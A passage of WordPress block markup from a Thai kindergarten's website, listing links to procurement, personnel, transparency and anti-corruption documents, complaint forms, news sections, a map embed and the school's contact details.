Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1woP9ChkM3zQI8gthAIPX43-z4ymQZZLk/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=drive_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1YhuyYvmrvtvgv6jkYfYHMulIorbiuLIA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1Nf4XWZmTyc4NdsmEJfShsVdo2WXGwzgr/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=sharing\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1l-VlfXu6thxBFvL0JpgAcCUrTrqNNp4G/view?usp=sharing\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1AeKeechkWj0RdYe5xvMgrFXsQiTu26xV/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline 